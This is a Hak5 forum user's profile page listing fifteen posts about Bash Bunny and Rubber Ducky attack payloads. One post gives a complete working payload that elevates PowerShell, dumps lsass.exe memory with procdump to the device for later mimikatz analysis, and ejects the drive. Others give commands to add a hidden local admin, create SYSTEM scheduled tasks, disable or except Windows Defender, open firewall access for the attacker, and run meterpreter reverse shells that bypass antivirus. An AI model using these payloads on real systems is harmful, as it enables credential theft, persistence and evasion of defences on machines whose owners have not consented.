Active Members
  • Content count

  • Joined

  • Last visited

  • Days Won


About rottingsun

  • Rank
    Hak5 Fan ++

Recent Profile Visitors

1,512 profile views
  1. Is it assumed that the user you are attacking has local admin privs to begin with? If so, you have 2 options: - Create a new local admin with net user myuser userpass /add and then net localgroup Administrators myuser /add. - Use schtasks to create a scheduled task as the new local admin you just created. or -Just create a new scheduled task as system, which doesn't require a password if the user you're running the bunny against has local admin privs. You'll have to play with the schtasks command options to get the every x minutes timing down, but the general syntax for options 1 & 2 should look something like this: schtasks /Create /TR "C:\windows\System32\cmd.exe" /TN "cmdex" /RU myuser /RP userpass /ST 19:08 /SC Once /RL HIGHEST schtasks /Create /TR "C:\windows\System32\cmd.exe" /TN "cmdex" /RU system /ST 19:08 /SC Once /RL HIGHEST
  2. Here's my working code for running an executable (procdump) from the bunny within powershell and the saving the dump file to the bunny, given the user has local admin privs to begin with. Note that in the line that runs procdump, the & character occurs at the front of the command. It is a special powershell operator that evaluates the text following the & character as a command and not a powershell object. LED Y 100 source LED B 100 ATTACKMODE HID STORAGE Q GUI r Q DELAY 500 Q STRING powershell Start-Process powershell -Verb runAs Q ENTER Q DELAY 1000 Q ALT y Q DELAY 500 Q STRING \$bunny\=\(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\) Q DELAY 500 Q ENTER Q DELAY 500 Q STRING \& \$bunny\\payloads\\$SWITCH_POSITION\\Procdump\\procdump.exe -accepteula -ma lsass.exe \$bunny\\loot\\takeadump\\lsd.dmp Q ENTER Q DELAY 200 Q STRING \$driveEject\=New-Object -comObject Shell.Application Q ENTER Q DELAY 200 Q STRING \$driveEject.Namespace\(17\).ParseName\(\$bunny\).InvokeVerb\(\"Eject\"\) Q ENTER Q DELAY 200 Q STRING exit Q ENTER LED FINISH
  3. Perhaps LLMNR, NETBIOS, and WPAD are all disabled on the target? Far fetched of it's a home PC i know but.
  4. Nice. I got mine in recently. My first payload was running procdump from the bunny and then saving the dump file onto the bunny for later mimikatz analysis.
  5. A technique I've been experimenting with that gets past both Win Defender and Vipre AV currently is a custom shellcode loader, as per I've used the loader almost verbatim with a shikata_na_gai meterpreter rev_tcp payload to successfully bypass both.
  6. The latest Empire stagers actually have a bunny target.
  7. Very nice. I actually never thought of the bunny/ducky in the context of legitimate uses. I got a bunny personally so I can demo to management what happens if I grant a non-IT user local admin perms like I sometimes get asked.
  8. I believe RDP locks the session of the currently logged in user, which would be a dead give away. Would this payload be more in the context of a sneak attack while a user is away? Not knocking it - just wondering the intent.
  9. KeePass is really awesome. Just make sure an attacker using Empire doesn't get a shell on your system. It includes a module called KeeThief which can display your master password in cleartext.
  10. I ordered a bunny late last night. Looking forward to trying out this payload and maybe adding in the concepts I mentioned.
  11. I would but I don't wanna be hungover for work tomorrow.
  12. Right, but this payload actually does assume that the machine being attacked is already logged in with admin rights as per the description - #OS: Windows (Requires Powershell and Admin Rights) This would be a great payload for the case of a target running say Windows 10 Home as the default user that also happens to be part of the Local Admins group. It's safe to assume that probably alot of home users run Windows like that. On the other hand, this payload should NEVER work in a corporate/AD environment if even the most basic security practices are being followed. I am sure we'd all be shocked though at the number of AD setups where every user is a local admin, and god forbid, a domain admin.
  13. Anything can be done with a little ingenuity and local admin privs, which this payload does assume that the logged in user has. I have several ideas that could enhance this already good payload, including: - The one I previously posted about. That is, making the new user invisible to the Windows logon screen. - Creating an elevated scheduled task (Run with Highest Privileges option) with the new user creds. The task executes a meterpreter payload to connect back to the attacking machine after 1 minute, 5 minutes, whatever. The meterpreter session created from the scheduled task returns with UAC already bypassed, allowing for a simple getsystem command to elevate within meterpreter. EDIT: Actually it looks like meterpreter shell already does this the way it's implemented here. - Using Set-MpPreference to disable Windows Defender, although this is a bit "noisy" since it displays a tray popup. An alternative would be to use Set-MpPreference to set a folder exception for Windows Defender before copying any binaries that might otherwise be flagged from the bunny to the exception folder. - Use powershell to add a Windows Firewall exception to allow all incoming traffic from your attacking IP. The possibilities are endless. I guess I just need to break down and order a bunny.
  14. Very nice payload. It'd be sweet to go even a step further and hide the new user from the Windows login screen with reg commands, as per the technique outlined in this post:
  15. Here is what I always used for enumerating the duck by the label DUCKY - for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duckydrive=%d Then the ducky can actually be referenced by letter with the env var %duckydrive%.